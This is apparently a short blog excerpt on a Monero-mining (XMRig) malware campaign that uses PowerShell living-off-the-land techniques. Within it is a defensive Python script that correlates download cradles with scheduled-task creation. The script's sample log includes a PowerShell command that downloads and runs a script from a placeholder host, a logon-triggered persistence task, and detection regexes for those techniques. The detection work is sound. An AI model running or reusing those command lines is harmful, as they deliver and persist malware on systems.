Digging Gold with a Spoon – Resurgence of Monero-mining Malware

Resurgence of Monero-mining Malware

Is it the same XMRig threat from the past?

What is apparent with the current XMRig threat is its multi-staged approach and its use of LOLBAS (Living Off the Land Binaries and Scripts) techniques. These techniques leverage pre-installed Windows tools such as PowerShell for downloading and executing the payload, for detection evasion, and for scheduled-task persistence. These initial-stage behaviors were offloaded from the malicious XMRig binaries observed in 2023, which shrank the current binary version down to about 1MB and left it focused on cryptomining only.
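The chain summarized above, a PowerShell download-and-execute stage followed by scheduled-task persistence, is what a defender would hunt for in process-creation telemetry. The following Python is an added example and is not code from the G Data article or from the analyzed malware: the pipe-delimited log format, host names, task names and URL are constructed for illustration, and the command-line switches and cradle keywords it matches are generic LOLBAS indicators rather than values taken from the article.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample of process-creation events in a hypothetical
# "timestamp|host|parent image|command line" format (not real telemetry).
SAMPLE_EVENTS = """\
2024-05-01T10:00:01|WS-07|explorer.exe|"C:\\Windows\\System32\\notepad.exe" report.txt
2024-05-01T10:02:14|WS-07|wscript.exe|powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri http://example.invalid/stage2.ps1 -OutFile C:\\Users\\Public\\stage2.ps1; & C:\\Users\\Public\\stage2.ps1"
2024-05-01T10:02:20|WS-07|powershell.exe|schtasks.exe /create /tn "SystemUpdater" /tr "powershell.exe -File C:\\Users\\Public\\stage2.ps1" /sc onlogon /rl highest
2024-05-01T11:30:00|WS-12|svchost.exe|schtasks.exe /create /tn "BackupJob" /tr "C:\\Program Files\\Backup\\backup.exe" /sc daily
2024-05-01T11:45:00|WS-12|cmd.exe|powershell.exe Get-ChildItem C:\\Temp
"""

# Generic indicator patterns (assumed, not taken from the article).
POWERSHELL = re.compile(r"\bpowershell(\.exe)?\b", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer)", re.I)
PS_EVASION = re.compile(
    r"(-ExecutionPolicy\s+Bypass|-NoProfile|-WindowStyle\s+Hidden|-w\s+hidden|-nop\b)", re.I)
TASK_CREATE = re.compile(r"schtasks(\.exe)?\s+/create", re.I)
# A task whose action (/tr) launches a script interpreter rather than a plain binary.
SCRIPT_IN_TASK = re.compile(r"/tr\s+\"?[^\"]*(powershell|cmd|wscript|cscript|mshta)", re.I)


@dataclass
class Event:
    ts: datetime
    host: str
    parent: str
    cmdline: str


def parse_events(text):
    """Parse the constructed pipe-delimited log into Event records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, parent, cmdline = line.split("|", 3)
        events.append(Event(datetime.fromisoformat(ts), host, parent, cmdline))
    return events


def score_event(ev):
    """Return the list of indicator names that match a single event."""
    reasons = []
    c = ev.cmdline
    is_ps = POWERSHELL.search(c) is not None
    if is_ps and DOWNLOAD_CRADLE.search(c):
        reasons.append("powershell download cradle")
    if is_ps and PS_EVASION.search(c):
        reasons.append("powershell evasion switches")
    if TASK_CREATE.search(c):
        reasons.append("scheduled task creation")
        if SCRIPT_IN_TASK.search(c):
            reasons.append("task runs a script interpreter")
    return reasons


def find_chains(events, window=timedelta(minutes=10)):
    """Correlate a download cradle with a task creation on the same host
    within `window`; the pairing is a stronger signal than either alone."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_host.setdefault(ev.host, []).append(ev)
    chains = []
    for host, evs in by_host.items():
        for i, ev in enumerate(evs):
            if "powershell download cradle" not in score_event(ev):
                continue
            for later in evs[i + 1:]:
                if later.ts - ev.ts > window:
                    break
                if "scheduled task creation" in score_event(later):
                    chains.append((host, ev.ts, later.ts))
    return chains


def analyze(text):
    """Flag individual suspicious events and correlated stage chains."""
    events = parse_events(text)
    flagged = [(ev.ts, ev.host, score_event(ev)) for ev in events if score_event(ev)]
    return {"flagged": flagged, "chains": find_chains(events)}


if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for ts, host, reasons in result["flagged"]:
        print(ts, host, ", ".join(reasons))
    for host, start, end in result["chains"]:
        print(f"CHAIN on {host}: download at {start} -> task at {end}")
```

On the constructed sample, the lone `schtasks /create` for a backup binary on WS-12 is flagged only as a plain task creation, while WS-07 produces a correlated chain because the cradle and the interpreter-backed task occur within minutes of each other; tuning `window` and the per-indicator weighting is where real deployments spend their effort.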

A notable observation is that the scripts were written in plain text, without any form of encoding or obfuscation. The scripts even had straightforward comments describing the use of the commands, indicating that they may have been created by LLMs, copied from a certain malware kit, or produced by “script kiddies”. Although the scripts were written in a simple manner, this simplicity proved effective: they had a very low reputation score from antivirus vendors (according to VirusTotal) at the time of discovery.

The current binary version targets a more diverse set of countries, which still includes Russia but now also adds Belgium, Greece, and China to the roster. In comparison, the 2023 version, according to our telemetry and intelligence data, primarily affected Russia, Azerbaijan, and Uzbekistan.

To read the complete article see: G Data Blog

This post is licensed under CC BY 4.0 by the author.